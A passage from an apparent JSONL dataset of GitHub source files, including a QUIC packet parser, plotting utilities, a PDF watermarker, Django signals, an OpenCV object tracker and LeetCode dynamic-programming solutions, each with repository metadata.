logger.debug(f\"version in bytes: {int_to_bytes(version)}\")\n\n # validate version\n if version in (QuicProtocolVersion.NEGOTIATION,\n QuicProtocolVersion.VERSION_1,\n QuicProtocolVersion.SAEM_QUIC):\n logger.debug(f\"version is valid\")\n else:\n logger.debug(f\"version is invalid\")\n\n # parse dest CID\n dest_id_len = packet.pull_uint8()\n logger.debug(f\"dest id len: {dest_id_len}\")\n dest_id = packet.pull_bytes(dest_id_len)\n logger.debug(f\"dest id: {dest_id}\")\n\n # parse src CID\n src_id_len = packet.pull_uint8()\n logger.debug(f\"peer id len: {src_id_len}\")\n src_id = packet.pull_bytes(src_id_len)\n logger.debug(f\"peer id: {src_id}\")\n\n if packet_type == PACKET_TYPE_INITIAL:\n # parse token\n # TODO: implement tokens\n pass\n\n logger.debug(f\"packet peek: {packet.peek(10).hex(' ', 1)}\")\n\n # parse payload length\n\n if packet_type in (PACKET_TYPE_INITIAL, PACKET_TYPE_ZERO_RTT, PACKET_TYPE_HANDSHAKE):\n\n # parse payload\n payload_length = packet.pull_uint_var()\n\n logger.debug(f\"payload length: {payload_length}\")\n # parse packet number\n packet_number = packet.pull_bytes(packet_num_length)\n # packet_number = packet.pull_uint_var()\n logger.debug(f\"packet number: {packet_number}\")\n logger.debug(f\"payload data: {packet.peek(payload_length)}\")\n # parse packet payload\n payload_data = packet.pull_bytes(payload_length)\n logger.debug(f\"payload data: {payload_data}\")\n logger.debug(f\"payload data: {payload_data.hex(' ', 1)}\")\n\n # parse packet payload data\n parsed_frames = self._frame_parser.parse(\n Buffer(data=payload_data))\n\n parsed_packet = QuicParsedPacket(\n is_long_header=long_header,\n packet_type=packet_type,\n version=version,\n dest_cid=dest_id,\n src_cid=src_id,\n payload=payload_data,\n frames=parsed_frames\n )\n\n self._parsed_packets.append(parsed_packet)\n\n else:\n # parse short header packet\n logger.debug(f\"parsing short header\")\n\n # parse dest CID\n dest_id_len = 8\n logger.debug(f\"dest id len: {dest_id_len}\")\n dest_id = packet.pull_bytes(dest_id_len)\n logger.debug(f\"dest id: {dest_id}\")\n\n header_index = packet.tell()\n\n # parse payload\n payload_length = packet.pull_uint_var()\n\n logger.debug(f\"payload length: {payload_length}\")\n # parse packet number\n packet_number = packet.pull_bytes(packet_num_length)\n # packet_number = packet.pull_uint_var()\n logger.debug(f\"packet number: {packet_number}\")\n logger.debug(f\"payload data: {packet.peek(payload_length)}\")\n # parse packet payload\n payload_data = packet.pull_bytes(payload_length)\n logger.debug(f\"payload data: {payload_data}\")\n logger.debug(f\"payload data: {payload_data.hex(' ', 1)}\")\n\n dec_payload_data = self._symmetric_context.decrypt(\n payload_data, b\"test_associated\")\n logger.debug(f\"decrypted short header payload: {dec_payload_data}\")\n\n # parse packet payload data\n parsed_frames = self._frame_parser.parse(\n Buffer(data=dec_payload_data))\n\n parsed_packet = QuicParsedPacket(\n is_long_header=long_header,\n packet_type=packet_type,\n dest_cid=dest_id,\n payload=payload_data,\n frames=parsed_frames\n )\n\n self._parsed_packets.append(parsed_packet)\n","repo_name":"eunsaemy/python_quic","sub_path":"quic/packet_parser.py","file_name":"packet_parser.py","file_ext":"py","file_size_in_byte":7205,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"26853249406","text":"from __future__ import absolute_import\nimport numpy as np\nimport dama as dm\nfrom matplotlib import pyplot as plt\n'''Module to provide plotting convenience functions\nto be used by data source classes\n'''\n\n__license__ = '''Copyright 2019 Philipp Eller\n\nLicensed under the Apache License, Version 2.0 (the \"License\");\nyou may not use this file except in compliance with the License.\nYou may obtain a copy of the License at\n\n http://www.apache.org/licenses/LICENSE-2.0\n\nUnless required by applicable law or agreed to in writing, software\ndistributed under the License is distributed on an \"AS IS\" BASIS,\nWITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\nSee the License for the specific language governing permissions and\nlimitations under the License.'''\n\n# === Modernized ===\n\n\ndef plot_bands(source, var=None, fig=None, ax=None, labels=None, filled=True, lines=False, **kwargs):\n '''\n plot band between the variable's values (expect each bin to have a 1d array)\n\n Parameters:\n -----------\n var : str\n Variable name ot be plotted (if source type is GridArry or GridData with\n a single variable, then that one is used by default)\n \n fig, ax : matplotlib figure and axis (optional)\n\n labels : iterable\n lables to add for the bands\n\n filled : bool\n Draw filled areas between bands\n\n lines : bool\n Draw lines at bands\n '''\n\n #ToDo: fix invalid values\n\n assert isinstance(source, (dm.GridData, dm.GridArray))\n assert source.grid.nax == 1\n\n if isinstance(source, dm.GridData):\n if var is None and len(source.data_vars) == 1:\n var = source.data_vars[0]\n data = np.ma.asarray(source[var])\n\n else:\n data = np.ma.asarray(source)\n\n if fig is None:\n fig = plt.gcf()\n if ax is None:\n ax = plt.gca()\n\n cmap = kwargs.pop('cmap', 'Blues')\n cmap = plt.get_cmap(cmap)\n\n n_points = data.shape[1]\n n_bands = (n_points + 1) // 2\n\n if lines:\n linestyles = kwargs.pop('linestyles', ['-']*n_bands)\n linecolors = kwargs.pop('linecolors', ['k']*n_bands)\n\n colors = cmap(np.linspace(0, 1, n_bands + 1))[1:]\n colors = kwargs.pop('colors', colors)\n\n grid_axis = source.grid.axes[0]\n\n for i in range(n_bands):\n upper_idx = n_points - i - 1\n if labels is not None and i < len(labels):\n label = labels[i]\n else:\n label = None\n\n if grid_axis.has_points:\n if not upper_idx == i:\n if filled:\n ax.fill_between(\n grid_axis.points,\n data[:, i],\n data[:, upper_idx],\n color=colors[i],\n label=label,\n **kwargs\n )\n if lines:\n ax.plot(\n grid_axis.points,\n data[:, i],\n color=linecolors[i],\n linestyle=linestyles[i],\n label=label,\n **kwargs\n )\n ax.plot(\n grid_axis.points,\n data[:, upper_idx],\n color=linecolors[i],\n linestyle=linestyles[i],\n **kwargs\n )\n else:\n if filled:\n ax.plot(\n grid_axis.points,\n data[:, i],\n color=colors[i],\n label=label,\n **kwargs\n )\n if lines:\n ax.plot(\n grid_axis.points,\n data[:, i],\n color=linecolors[i],\n linestyle=linestyles[i],\n label=label,\n **kwargs\n )\n\n else:\n if not upper_idx == i:\n if filled:\n ax.bar(\n grid_axis.edges.edges[:, 0],\n data[:, upper_idx] - data[:, i],\n bottom=np.nan_to_num(data[:, i]),\n width=grid_axis.edges.width,\n color=colors[i],\n align='edge',\n label=label,\n **kwargs\n )\n if lines:\n band_data = np.ma.asarray(data[:, i])\n band_data = np.ma.append(band_data, band_data[-1])\n ax.step(\n grid_axis.squeezed_edges,\n band_data,\n where='post',\n label=label,\n color=linecolors[i],\n linestyle=linestyles[i],\n **kwargs\n )\n band_data = np.ma.asarray(data[:, upper_idx])\n band_data = np.ma.append(band_data, band_data[-1])\n ax.step(\n grid_axis.squeezed_edges,\n band_data,\n where='post',\n color=linecolors[i],\n linestyle=linestyles[i],\n **kwargs\n )\n else:\n band_data = np.ma.asarray(data[:, i])\n band_data = np.ma.append(band_data, band_data[-1])\n if filled:\n ax.step(\n grid_axis.squeezed_edges,\n band_data,\n where='post',\n label=label,\n color=colors[i],\n **kwargs\n )\n if lines:\n ax.step(\n grid_axis.squeezed_edges,\n band_data,\n where='post',\n label=label,\n color=linecolors[i],\n linestyle=linestyles[i],\n **kwargs\n )\n\n ax.set_xlabel(source.grid.vars[0])\n if source.grid.axes[0].log:\n ax.set_xscale('log')\n ax.set_ylabel(var)\n\n if grid_axis.has_points:\n ax.set_xlim(grid_axis.points.min(), grid_axis.points.max())\n else:\n ax.set_xlim(grid_axis.edges.min(), grid_axis.edges.max())\n\n\ndef plot_map(source, var=None, cbar=False, fig=None, ax=None, **kwargs):\n '''\n plot a 2d color map\n\n Parameters:\n -----------\n\n var : str (optional)\n Variable name ot be plotted (if source type is GridArry or GridData with\n a single variable, then that one is used by default)\n cbar : bool (optional)\n Add colorbar to axis\n fig, ax : matplotlib figure and axis (optional)\n '''\n assert isinstance(source, (dm.GridData, dm.GridArray))\n assert source.grid.nax == 2\n\n if isinstance(source, dm.GridData):\n if var is None and len(source.data_vars) == 1:\n var = source.data_vars[0]\n data = source[var]\n\n else:\n data = source\n\n if fig is None:\n fig = plt.gcf()\n if ax is None:\n ax = plt.gca()\n\n data = np.ma.asarray(data)\n\n if data.ndim == source.grid.nax + 1 and data.shape[-1] == 3:\n # plot as image\n pc = ax.imshow(\n data.swapaxes(0, 1)[::-1, :, :],\n extent=(\n source.grid.edges[0].min(), source.grid.edges[0].max(),\n source.grid.edges[1].min(), source.grid.edges[1].max()\n ),\n **kwargs\n )\n else:\n X, Y = source.grid.edge_meshgrid\n pc = ax.pcolormesh(\n X, Y, data.T, linewidth=0, rasterized=True, **kwargs\n )\n if cbar:\n fig.colorbar(pc, ax=ax, label=kwargs.pop('label', var))\n\n ax.set_xlabel(source.grid.vars[0])\n if source.grid.axes[0].log:\n ax.set_xscale('log')\n ax.set_ylabel(source.grid.vars[1])\n if source.grid.axes[1].log:\n ax.set_yscale('log')\n ax.set_xlim(source.grid.edges[0].min(), source.grid.edges[0].max())\n ax.set_ylim(source.grid.edges[1].min(), source.grid.edges[1].max())\n return pc\n\n\ndef plot_step(source, var=None, label=None, fig=None, ax=None, step=None, **kwargs):\n '''\n plot a step function, i.e. histogram\n var : str\n Variable name ot be plotted (if source type is GridArry or GridData with\n a single variable, then that one is used by default)\n label : str\n fig, ax : matplotlib figure and axis (optional)\n step : bool, (optional)\n whether to plot as steps or lines\n '''\n assert isinstance(source, (dm.GridData, dm.GridArray))\n assert source.grid.nax == 1\n\n if step is None:\n step = source.grid.axes[0].has_edges\n\n if isinstance(source, dm.GridData):\n if var is None and len(source.data_vars) == 1:\n var = source.data_vars[0]\n data = np.array(source[var])\n\n else:\n data = np.array(source)\n\n if fig is None:\n fig = plt.gcf()\n if ax is None:\n ax = plt.gca()\n\n data = np.ma.asarray(data)\n\n if step:\n s = ax.step(\n source.grid.squeezed_edges[0],\n np.ma.append(data, data[-1]),\n where='post',\n label=label,\n **kwargs\n )\n else:\n s = ax.plot(\n source.grid.points[0],\n data,\n label=label,\n **kwargs )\n\n ax.set_xlabel(source.grid.vars[0])\n if source.grid.axes[0].log:\n ax.set_xscale('log')\n ax.set_ylabel(var)\n return s\n\n\ndef plot1d_all(source, *args, **kwargs):\n fig = kwargs.pop('fig', plt.gcf())\n ax = kwargs.pop('ax', plt.gca())\n\n if isinstance(source, dm.PointArray):\n return ax.plot(source)\n\n for var in source.vars:\n ax.plot(source[var], label=var)\n\n\n# --- to be fixed ---\n\n\ndef plot1d(source, x, *args, **kwargs):\n '''1d plot'''\n fig = kwargs.pop('fig', plt.gcf())\n ax = kwargs.pop('ax', plt.gca())\n p = ax.plot(source[x], *args, **kwargs)\n ax.set_ylabel(x)\n return p\n\n\ndef plot(source, *args, labels=None, **kwargs):\n '''2d plot\n \n Parameters:\n -----------\n\n args[0] : str or Iterable (optional)\n data variables to plot \n args[1] : string or Iterable (optional)\n data variables to plot resulting in 2d plots\n labels : string or Iterable (optional)\n \n '''\n\n x = None\n y = None\n if len(args) > 0:\n if isinstance(args[0], str) and args[0] not in source.vars:\n x = None\n y = None\n else:\n x = args[0]\n args = args[1:]\n\n if len(args) > 0:\n if isinstance(args[0], str) and args[0] not in source.vars:\n y = None\n else:\n y = args[0]\n args = args[1:]\n\n fig = kwargs.pop('fig', plt.gcf())\n ax = kwargs.pop('ax', plt.gca())\n\n if x is None and y is None:\n if isinstance(source, dm.PointArray):\n return ax.plot(source, *args, label=labels, **kwargs)\n\n for i, var in enumerate(source.vars):\n if labels is None:\n label = var\n else:\n label = labels[i]\n ax.plot(source[var], *args, label=label, **kwargs)\n\n elif y is None:\n if isinstance(x, str):\n ax.plot(source[x], *args, label=labels, **kwargs)\n ax.set_ylabel(x)\n else:\n for i, x_var in enumerate(x):\n if labels is not None:\n label = labels[i]\n else:\n label = x_var\n ax.plot(source[x_var], *args, label=label, **kwargs)\n\n elif isinstance(x, str):\n if isinstance(y, str):\n p = ax.plot(source[x], source[y], *args, label=labels, **kwargs)\n ax.set_xlabel(x)\n ax.set_ylabel(y)\n return p\n else:\n for i, y_var in enumerate(y):\n if labels is not None:\n label = labels[i]\n else:\n label = None\n ax.plot(source[x], source[y_var], *args, label=label, **kwargs)\n ax.set_xlabel(x)\n else:\n if isinstance(y, str):\n for i, x_var in enumerate(x):\n if labels is not None:\n label = labels[i]\n else:\n label = None\n ax.plot(source[x_var], source[y], *args, label=label, **kwargs)\n ax.set_ylabel(y)\n\n else:\n\n assert len(x) == len(\n y\n ), 'Need same length of x and y variables list'\n\n for i, (x_var, y_var) in enumerate(zip(x, y)):\n if labels is not None:\n label = labels[i]\n else:\n label = None\n ax.plot(\n source[x_var], source[y_var], *args, label=label, **kwargs\n )\n\n\ndef plot_points_2d(\n source, x, y, s=None, c=None, cbar=False, fig=None, ax=None, **kwargs\n ):\n '''2d scatter plot'''\n if fig is None:\n fig = plt.gcf()\n if ax is None:\n ax = plt.gca()\n if c is not None:\n c_label = c\n c = source[c]\n else:\n assert not cbar\n if s is not None:\n if isinstance(s, str):\n s = source[s]\n sc = ax.scatter(\n np.array(source[x]),\n np.array(source[y]),\n s=np.array(s),\n c=np.array(c),\n **kwargs\n )\n if cbar:\n fig.colorbar(sc, ax=ax, label=c_label)\n ax.set_xlabel(x)\n ax.set_ylabel(y)\n return sc\n\n\ndef plot_contour(source, var=None, fig=None, ax=None, **kwargs):\n '''\n contours from gird data\n '''\n assert isinstance(source, (dm.GridData, dm.GridArray))\n assert source.grid.nax == 2\n\n if isinstance(source, dm.GridData):\n if var is None and len(source.data_vars) == 1:\n var = source.data_vars[0]\n data = np.ma.asarray(source[var])\n\n else:\n data = np.ma.asarray(source)\n\n\n\n if fig is None:\n fig = plt.gcf()\n if ax is None:\n ax = plt.gca()\n X, Y = source.grid.point_meshgrid\n\n labels = kwargs.pop('labels', None)\n inline = kwargs.pop('inline', True)\n\n cs = ax.contour(X, Y, data, **kwargs)\n\n if labels is not None:\n fmt = {}\n for l, s in zip(cs.levels, labels):\n fmt[l] = s\n\n ax.clabel(cs, cs.levels, inline=inline, fmt=fmt)\n\n if source.grid.axes[0].log:\n ax.set_xscale('log')\n if source.grid.axes[1].log:\n ax.set_yscale('log')\n\n return cs\n\n\ndef plot_errorband(source, var, errors, fig=None, ax=None, **kwargs):\n '''\n plot a step histogram with errorbars around it as bands\n '''\n if fig is None:\n fig = plt.gcf()\n if ax is None:\n ax = plt.gca()\n if isinstance(errors, (tuple, list)):\n lower_error = source[errors[0]]\n upper_error = source[errors[1]]\n elif isinstance(errors, str):\n lower_error = source[errors]\n upper_error = lower_error\n else:\n raise TypeError(\n 'errors must be tuple of variable names or a single variable name'\n )\n assert source.grid.nax == 1\n\n ax.bar(\n source.grid[0].points,\n lower_error + upper_error,\n bottom=source[var] - lower_error,\n width=source.grid[0].edges.width,\n **kwargs\n )\n ax.set_xlabel(source.grid[0].var)\n\n if source.grid.axes[0].log:\n ax.set_xscale('log')\n","repo_name":"philippeller/dama","sub_path":"dama/plotting/stat_plot.py","file_name":"stat_plot.py","file_ext":"py","file_size_in_byte":15938,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"66"} +{"seq_id":"15494428586","text":"import PyPDF2\n\ntemplate = 'C:\\\\Users\\\\JR0544\\\\PycharmProjects\\\\ZeroToMastery\\\\PDFs\\\\2020ViaBenefitsCostSummary.pdf'\nmarker = 'C:\\\\Users\\\\JR0544\\\\PycharmProjects\\\\ZeroToMastery\\\\PDFs\\\\original.pdf'\n\n# template = PyPDF2.PdfFileReader(open('C:\\\\Users\\\\JR0544\\\\PycharmProjects\\\\ZeroToMastery\\\\PDFs\\\\2020ViaBenefitsCostSummary.pdf', 'rb'))\n# marker = PyPDF2.PdfFileReader(open('C:\\\\Users\\\\JR0544\\\\PycharmProjects\\\\ZeroToMastery\\\\PDFs\\\\original.pdf', 'rb'))\n\"\"\"\noutput = PyPDF2.PdfFileWriter()\n\nfor i in range(template.getNumPages()):\n page = template.getPage(i)\n page.mergePage(marker.getPage(0))\n output.addPage(page)\n\nwith open('watermarker.pdf', 'wb') as file:\n output.write(file)\n\"\"\"\n\n\ndef pdf_watermarker(original, watermark):\n wtr_file = open(watermark, 'rb')\n\n original_file = open(original, 'rb')\n original_reader = PyPDF2.PdfFileReader(original_file)\n\n writer = PyPDF2.PdfFileWriter();\n\n for original_page in original_reader.pages:\n wtr_reader = PyPDF2.PdfFileReader(wtr_file)\n wtr_page = wtr_reader.getPage(0)\n wtr_page.mergePage(original_page)\n writer.addPage(wtr_page)\n\n with open('watermarker.pdf', 'wb') as file:\n writer.write(file)\n original_file.close()\n wtr_file.close()\n\n\npdf_watermarker(template, marker)\n","repo_name":"jaggureddy/ZTM","sub_path":"ZeroToMastery/pdf/AddMarker.py","file_name":"AddMarker.py","file_ext":"py","file_size_in_byte":1290,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"31183616867","text":"import os\nimport time\nimport argparse\nimport sys\nimport multiprocessing\n\ndef read_file(filename, k):\n start_time = time.time()\n # Read file content into memory\n with open(filename, 'rb') as file:\n content = file.read()\n file_size = sys.getsizeof(content)\n end_time = time.time()\n read_time = end_time - start_time\n print(f\"[process {k}] file [{os.path.basename(filename)}] read time: {read_time:.2f} seconds, size: {file_size / (1024*1024)} MB\")\n return read_time\n\ndef read_files_in_folder(folder_path, k, N):\n for filename in os.listdir(folder_path)[k::N]:\n full_filepath = os.path.join(folder_path, filename)\n if os.path.isfile(full_filepath):\n read_file(full_filepath, k)\n\nif __name__ == \"__main__\":\n # usage: python this.py --path /your/file/path --task numbers_of_processes\n\n parser = argparse.ArgumentParser(description='File Read Time Test')\n parser.add_argument('--path', type=str, help='Path of the file to read')\n parser.add_argument('--task', type=int, help='Numbers of processes')\n args = parser.parse_args()\n N = args.task\n folder_path = args.path\n\n processes = []\n for k in range(N):\n p = multiprocessing.Process(target=read_files_in_folder, args=(folder_path, k, N))\n processes.append(p)\n p.start()\n\n for p in processes:\n p.join()","repo_name":"TangJicheng123/tools","sub_path":"py/read_test.py","file_name":"read_test.py","file_ext":"py","file_size_in_byte":1362,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"22429342802","text":"from django.db.models.signals import post_save\nfrom datetime import datetime\nfrom django.db.models.signals import pre_delete\nfrom django.dispatch import receiver\nfrom django.contrib.auth.models import Group\n\nfrom prenotazioni.models import Cancellazione, Paglione, Prenotazione\n\n\n@receiver(pre_delete, sender=Prenotazione)\ndef send_notification(sender, instance, **kwargs):\n\n # se la prenotazione che si sta per cancellare è la prima in coda\n if instance.primo_priorità():\n prossimi = Prenotazione.objects.filter(ora_prenotata=instance.ora_prenotata,\n paglione=instance.paglione).order_by('priorità')\n # se nella coda esiste un secondo utente\n if len(prossimi) > 1:\n message = str(prossimi[1].utente) + \" ha ora accesso al paglione n.\" + str(\n instance.paglione.id) + \" alle ore \" + str(instance.ora_prenotata)\n message = \"Il paglione n.\" + str(\n instance.paglione.id) + \" che hai prenotato per l'ora \" + str(instance.ora_prenotata) + \" si è liberato !\"\n cancellazione = Cancellazione.objects.create(\n messaggio=message, utente=prossimi[1].utente, ora_creazione=datetime.now())\n cancellazione.save()\n\n\n@receiver(post_save, sender=Paglione)\ndef elimina_prenotazioni_paglione_non_attivo(sender, instance, **kwargs):\n if not instance.attivo:\n prenotazioni = instance.prenotazioni.all()\n # check per eliminare possibili prenotazioni di allievi collegate a quelle di maestri che si stanno ora cancellando\n for prenotazione in prenotazioni:\n if prenotazione.utente.groups.filter(name='Maestri').exists():\n prenotazioni_allievi = Prenotazione.objects.filter(\n ora_prenotata=prenotazione.ora_prenotata, utente__groups=Group.objects.get(name='Allievi'))\n prenotazioni_allievi.delete()\n prenotazioni.delete()\n","repo_name":"noceg43/tec-web","sub_path":"progetto/campo/prenotazioni/signals.py","file_name":"signals.py","file_ext":"py","file_size_in_byte":1956,"program_lang":"python","lang":"it","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"71122125330","text":"#!/usr/bin/env python\n\n'''\nWelcome to the Object Tracking Program!\n\nUsing real-time streaming video from your built-in webcam, this program:\n - Creates a bounding box around a moving object\n - Calculates the coordinates of the centroid of the object\n - Tracks the centroid of the object\n\nAuthor:\n - Addison Sears-Collins\n - https://automaticaddison.com\n'''\n\nfrom __future__ import print_function # Python 2/3 compatibility\nimport cv2 # Import the OpenCV library\nimport numpy as np # Import Numpy library\n\n# Project: Object Tracking\n# Author: Addison Sears-Collins\n# Website: https://automaticaddison.com\n# Date created: 06/13/2020\n# Python version: 3.7\n\ndef main():\n\n cap = cv2.VideoCapture(0) # Create a VideoCapture object\n\n # Create the background subtractor object. Use the last 700 video frames to build the background\n back_sub = cv2.createBackgroundSubtractorMOG2(history=700, varThreshold=25, detectShadows=True)\n\n # Create kernel for morphological operation.\n # You can tweak the dimensions of the kernel e.g. instead of 20,20 you can try 30,30.\n kernel = np.ones((20,20),np.uint8)\n\n while(True):\n\n ret, frame = cap.read() # Capture frame-by-frame. This method returns True/False as well as the video frame.\n print(ret,frame)\n\n # Find the index of the largest contour and draw bounding box\n fg_mask_bb = create_fg_mask(back_sub, frame, kernel)\n contours, hierarchy = cv2.findContours(fg_mask_bb,cv2.RETR_TREE,cv2.CHAIN_APPROX_SIMPLE)[-2:]\n areas = [cv2.contourArea(c) for c in contours]\n\n # If there are countours\n if len(areas) > 0:\n max_index = np.argmax(areas) # Find the largest moving object in the image\n cnt = contours[max_index]\n highlight_contour(cnt, frame)\n display_frame(frame)\n\n # Close down the video stream\n cap.release()\n cv2.destroyAllWindows()\n\n\ndef highlight_contour(cnt, frame):\n x, y, w, h = cv2.boundingRect(cnt)\n cx = x + int(w / 2)\n cy = y + int(h / 2)\n draw_bounding_box(frame, h, w, x, y)\n draw_circle_in_box(cx, cy, frame)\n print_coordinates(cx, cy, frame)\n\ndef draw_bounding_box(frame, h, w, x, y):\n cv2.rectangle(frame, (x, y), (x + w, y + h), (0, 255, 0), 3)\n\ndef display_frame(frame):\n cv2.imshow('frame', frame)\n cv2.waitKey(1)\n\ndef create_fg_mask(back_sub, frame, kernel):\n fg_mask = back_sub.apply(frame) # Use every frame to calculate the foreground mask and update the background\n fg_mask = cv2.morphologyEx(fg_mask, cv2.MORPH_CLOSE, kernel) # Close dark gaps in foreground object using closing\n fg_mask = cv2.medianBlur(fg_mask, 5) # Remove salt and pepper noise with a median filter\n _, fg_mask = cv2.threshold(fg_mask, 127, 255, cv2.THRESH_BINARY) # Threshold the image to make it either black or white\n return fg_mask\n\n\n# Print the centroid coordinates (we'll use the center of the bounding box) on the image\ndef print_coordinates(cx, cy, frame):\n text = \"x: \" + str(cx) + \", y: \" + str(cy)\n cv2.putText(frame, text, (cx - 10, cy - 10), cv2.FONT_HERSHEY_SIMPLEX, 0.5, (0, 255, 0), 2)\n\n\n# Draw circle in the center of the bounding box\ndef draw_circle_in_box(cx, cy, frame):\n cv2.circle(frame, (cx, cy), 4, (0, 255, 0), -1)\n\n\nif __name__ == '__main__':\n print(__doc__)\n main()\n","repo_name":"curtcox/opencv-experiments","sub_path":"tracking.py","file_name":"tracking.py","file_ext":"py","file_size_in_byte":3377,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"26789800380","text":"# https://leetcode.com/problems/number-of-longest-increasing-subsequence/\n# https://www.youtube.com/watch?v=Tuc-rjJbsXU&list=PLot-Xpze53lcvx_tjrr_m2lgD2NsRHlNO&index=42\n\n# My Solution with DP : \n\nclass Solution:\n def findNumberOfLIS(self, nums: List[int]) -> int:\n dp = {}\n a = [1] * (len(nums))\n def recurse(i):\n if i>=len(nums):\n return 0\n if i in dp:\n return dp[i]\n \n Max = 1\n count = 1\n for j in range(i+1,len(nums)):\n if nums[i] < nums[j]:\n temp = 1 + recurse(j)\n if temp == Max:\n count += a[j]\n if temp > Max:\n Max = temp\n count = a[j]\n \n a[i] = count\n dp[i] = Max\n return dp[i]\n \n for i in range(len(nums)):\n recurse(i)\n \n b = []\n MaxLength = max(dp.values())\n for i,j in dp.items():\n if j == MaxLength:\n b.append(i)\n count = 0\n for i in b:\n count += a[i]\n return count\n \n# Solution with DP : \nclass Solution:\n def findNumberOfLIS(self, nums: List[int]) -> int:\n # 1. O(n^2) Recursive solution with Caching\n \n dp = {} # key = index, value = [length of LIS, count]\n lenLIS, res = 0, 0 # length of LIS, count of LIS\n \n def dfs(i):\n if i in dp: return dp[i]\n \n maxLen, maxCnt = 1, 1 # length and count of LIS\n for j in range(i + 1, len(nums)):\n if nums[j] > nums[i]: # make sure increasing order\n length, count = dfs(j)\n if length + 1 > maxLen:\n maxLen, maxCnt = length + 1, count\n elif length + 1 == maxLen:\n maxCnt += count \n nonlocal lenLIS, res\n if maxLen > lenLIS:\n lenLIS, res = maxLen, maxCnt\n elif maxLen == lenLIS:\n res += maxCnt\n dp[i] = [maxLen, maxCnt]\n return dp[i]\n\n for i in range(len(nums)): dfs(i)\n return res\n\n# Solution with pure DP : \nclass Solution:\n def findNumberOfLIS(self, nums: List[int]) -> int:\n # 2. O(n^2) Dynamic Programming \n \n dp = {} # key = index, value = [length of LIS, count]\n lenLIS, res = 0, 0 # length of LIS, count of LIS\n \n # i = start of subseq\n for i in range(len(nums) - 1, -1, -1):\n maxLen, maxCnt = 1, 1 # len, cnt of LIS start from i\n \n for j in range(i + 1, len(nums)):\n if nums[j] > nums[i]:\n length, count = dp[j] # len, cnt of LIS start from j\n if length + 1 > maxLen:\n maxLen, maxCnt = length + 1, count\n elif length + 1 == maxLen:\n maxCnt += count\n if maxLen > lenLIS:\n lenLIS, res = maxLen, maxCnt\n elif maxLen == lenLIS:\n res += maxCnt\n dp[i] = [maxLen, maxCnt]\n \n return res","repo_name":"OnkarNora/Dynamic-Programming-Leetcode","sub_path":"673-Number_Of_Longest_Increasing_Subsequences.py","file_name":"673-Number_Of_Longest_Increasing_Subsequences.py","file_ext":"py","file_size_in_byte":3263,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"16012614043","text":"#!/usr/bin/python\nif __name__ == '__main__':\n import tdc_vis\n\nimport os\n\nfrom ATvis.Common_Data_Plot import *\n\nfrom Auxiliary import *\nfrom Common_Data_Plot import *\nfrom x_PlottingFunctions import *\nfrom Movie import Movie_Interface_Selector\n\n\n\n# ============================================================\n# Figure Style Parameters\n# ============================================================\nfig_param = paramSingleFig_Presentation\n## fig_param = None\n\n\n# ============================================================\n# Directory\n# ============================================================\n# tdc_Filenames.set_results_dir('../RESULTS/WD')\ntdc_Filenames.set_results_dir('../RESULTS/WD/RS')\n## tdc_Filenames.set_results_dir('../RESULTS/WD/RS_2')\ntdc_Filenames.set_results_dir('../RESULTS/WD/TDC_Presentation')\n\n\ntdc_Filenames.set_vis_results_dir('../RESULTS_VIS/TDC_Presentation')\n\n# ============================================================\n# IDs \n# ============================================================\n# ID=['RS__R6_jp0.5_P0.2_L0.3_nGJ5e4_nx5e3_dt2e-5_sU']\n\nID=['RS__R6_jp0.5_P0.2_L0.3_nGJ5e4_nx5e3_dt2e-5_sU__wave']\n\n\n# ============================================================\n# plot limits:\n# ============================================================\nxlims = [[-0.005,0.305],[-0.005,0.305]]\n\nylims_xp_e = [[-5e8,5e8],[-.15,0.32]]\n\n\naxes_commands_xp = [['set_yticks([-1e8,-1e4,0,1e4,1e8])',\n 'set_xticks([0,0.1,0.2, 0.3])',\n 'xaxis.set_ticklabels([])'],\n ['set_yticks([0,0.2])',\n 'set_yticks([-0.1,0.1,0.3],minor=True)',\n 'set_xticks([0,0.1,0.2, 0.3])']]\n## axes_commands_xp = None\n# ----------------------------------------\n\n\n\nsample_dict = dict(name='regular',n_reduce=1,n_min=1000)\n## sample_dict = dict(name='regular',n_reduce=20,n_min=3000)\n\nparticle_names = ['Positrons','Electrons','Pairs']\n\nsymlog=True\nlinthreshy=5\n\ntt = None\ntt = [12.253,12.633]\n\nfps = 24\nkeep_frame_files=True\n\nuse_cell_coordinates=False\nshow_cells=False\nghost_points=False\n\n# moving_grid_dict = None\nmoving_grid_dict = dict(n_lines=20, speed=1)\n# ==================\n\n\n\ndef do_movie(ID):\n # select interface\n interface = Movie_Interface_Selector()\n \n tdc_plot_wave_xp_e_movie(interface.movie_module,\n ID,\n particle_names,\n ylims=ylims_xp_e,\n xlims=xlims,\n sample_dict=sample_dict,\n tt=tt,\n fps=fps,\n keep_frame_files=keep_frame_files,\n use_cell_coordinates=use_cell_coordinates,\n show_cells=show_cells,\n moving_grid_dict=moving_grid_dict,\n symlog=symlog,\n linthreshy=linthreshy,\n axes_commands = axes_commands_xp,\n xlabel=None,ylabel=None,idlabel=None,\n fig_param = fig_param,\n plot_style={'linewidth':2})\n\n \nif __name__ == \"__main__\":\n do_movie(ID)\n","repo_name":"atimokhin/tdc_vis","sub_path":"_working/rs/make_movie_wave.py","file_name":"make_movie_wave.py","file_ext":"py","file_size_in_byte":3276,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"33511588516","text":"from odoo import api, fields, models\n\n\nclass HrLeaveConfigSettings(models.TransientModel):\n _inherit = 'res.config.settings'\n\n alias_prefix = fields.Char(string='Default Alias Name for Leave', help='Default Alias Name for Leave')\n alias_domain = fields.Char(string='Alias Domain', help='Default Alias Domain for Leave',\n default=lambda self: self.env[\"ir.config_parameter\"].get_param(\"mail.catchall.domain\"))\n\n def set_values(self):\n super(HrLeaveConfigSettings, self).set_values()\n set_param = self.env['ir.config_parameter'].set_param\n set_param('alias_prefix', self.alias_prefix)\n set_param('alias_domain', 